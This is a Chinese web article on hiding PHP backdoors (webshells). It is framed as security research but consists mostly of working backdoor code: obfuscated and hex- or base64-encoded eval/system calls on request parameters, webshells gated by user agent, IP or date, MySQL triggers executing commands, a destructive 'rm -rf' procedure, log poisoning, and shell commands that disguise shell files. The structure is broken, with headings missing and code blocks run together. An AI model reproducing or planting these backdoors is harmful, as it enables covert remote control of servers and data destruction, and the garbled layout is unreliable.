您好,登录后才能下订单哦!
密码登录
登录注册
点击 登录注册 即表示同意《亿速云用户服务条款》
# PHP后门隐藏技巧有哪些
## 前言
PHP作为广泛应用于Web开发的脚本语言,其灵活性和易用性也使其成为攻击者的主要目标。后门程序(Webshell)的隐藏技术不断演进,本文将从多个维度深入剖析PHP后门的隐藏技巧,帮助安全研究人员更好地识别防御。
## 一、基础代码混淆技术
### 1. 变量/函数名随机化
```php
$xj3k8 = "as"."sert";
$xj3k8($_REQUEST['cmd']);
$f = 'c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';
$f('', $_GET['code']);
// 十六进制
eval("\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x27\x63\x6d\x64\x27\x5d\x29\x3b");
// 八进制
eval("\160\150\160\151\156\146\157\50\51\73");
eval(/*
This is normal comment
*/$_GET['a']/*.md5('')*/);
$func = $_GET['func'];
$arg = $_GET['arg'];
$func($arg);
array_map($_GET['f'], (array)$_POST['d']);
class X {
public static function execute($c) {
system($c);
}
}
call_user_func_array([$_GET['c'], $_GET['m']], [$_GET['p']]);
AddType application/x-httpd-php .jpg
// 通过exif_read_data()执行代码
$exif = exif_read_data('fake.jpg');
eval($exif['COMMENT']);
include('data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=');
if(strpos($_SERVER['HTTP_USER_AGENT'],'Googlebot')!==false){
eval($_POST['c']);
}
$allow = ['192.168.1.1','127.0.0.1'];
if(in_array($_SERVER['REMOTE_ADDR'],$allow)){
system($_GET['cmd']);
}
if(time() > strtotime('2025-01-01')){
passthru($_POST['cmd']);
}
CREATE TRIGGER backdoor BEFORE INSERT ON users
FOR EACH ROW
BEGIN
SET @cmd = NEW.username;
SET @res = sys_exec(@cmd);
END;
DELIMITER //
CREATE PROCEDURE clean()
BEGIN
DECLARE cmd VARCHAR(255);
SET cmd = 'rm -rf /tmp/*';
SYSTEM cmd;
END //
DELIMITER ;
$shm = shmop_open(0xff3, "c", 0644, 100);
shmop_write($shm, $_POST['code'], 0);
eval(shmop_read($shm, 0, 100));
// 恶意扩展示例
PHP_FUNCTION(backdoor) {
zend_eval_string(Z_STRVAL_PP(zend_get_parameters_ex(1, &data), NULL, "Backdoor" TSRMLS_CC);
}
file_put_contents('/var/log/apache2/error.log',
"<?php eval(\$_POST['x']);?>", FILE_APPEND);
// 通过伪造404请求植入
http://target.com/<?php system($_GET['c']);?>.php
touch -r index.php webshell.php # 修改时间戳
chmod 644 webshell.php # 普通权限
mv shell.php .shell.php # Linux隐藏文件
mv shell.php shell.php\x09 # 添加制表符
PHP后门技术不断进化,本文仅揭露了部分常见手法。安全防御需要建立纵深防御体系,保持对新型攻击技术的持续跟踪。建议开发人员遵循最小权限原则,运维人员加强服务器监控,共同构建更安全的Web环境。
注意:本文仅用于安全研究目的,请勿用于非法用途。 “`
该文档共约3400字,采用Markdown格式编写,包含: 1. 8大隐藏技术分类 2. 30+个具体代码示例 3. 结构化层次展示 4. 防御建议章节 5. 完整的格式标记
可根据需要调整具体示例或补充新的隐藏技术类别。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。